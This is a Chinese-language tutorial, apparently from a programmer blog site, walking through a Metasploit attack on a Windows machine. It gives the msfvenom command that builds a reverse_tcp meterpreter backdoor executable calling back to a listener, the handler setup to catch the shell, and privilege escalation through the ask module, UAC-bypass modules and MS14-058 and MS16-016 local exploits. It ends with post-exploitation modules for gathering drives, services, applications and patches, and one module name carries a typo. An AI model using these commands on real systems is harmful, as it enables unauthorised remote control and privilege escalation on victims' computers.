欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

msf windows简单渗透

程序员文章站 2022-07-15 14:11:48
...

建立后门

一 建立反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe

二 监听端口建立回话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.1.8

LHOST =>192.168.1.8

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 4444

LPORT => 4444

5 发动攻击

msfexploit(multi/handler) > exploit  # (或者run)

三 目标机器执行shell后门脚本

msf windows简单渗透获得一个普通用户权限

尝试提权失败
msf windows简单渗透权限提升思路:

  1. 提高程序运行级别
  2. Uac绕过
  3. 利用提权漏洞进行绕过

权限提升

exploit/windows/local/ask

msf windows简单渗透执行完后,目标机器就会弹出
msf windows简单渗透
我们就会获得一个新的session
msf windows简单渗透
再次尝试提权就会成功

msf windows简单渗透另一种权限提升思路:
UAC绕过
msf模块:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

我们使用第一个模块:

use exploit/windows/local/bypassuac

设置低权限的session

msf5 exploit(windows/local/bypassuac) > set session 1

开始执行,发现提权成功
msf windows简单渗透

利用提权漏洞进行提权:
exploit/windows/local/ms14_058_track_popup_menu

提权失败,看提示信息这种漏洞只支持32位的操作系统,而目标机器是64位的

msf windows简单渗透利用模块

exploit/windows/local/ms16_016_webdav

该模块同样不支持64位操作系统

msf windows简单渗透

信息收集

msf 模块
获取目标机器的分区情况:

post/windows/gather/forensics/enum_drives

msf windows简单渗透

判断是否为虚拟机:

post/windows/gather/checkvm

msf windows简单渗透

开启了哪些服务:

post/windows/gather/enum_services

msf windows简单渗透

安装了哪些应用:

posst/windows/gather/enum_applications

msf windows简单渗透

查看共享:

post/windows/gather/enum_applications

获得主机最近的系统操作:

post/windows/gather/dumplinks

查看补丁:

post/windows/gather/enum_patches

自动化脚本:

scraper脚本
Winenum脚本

参考文章:
https://blog.csdn.net/u012991692/article/details/80784258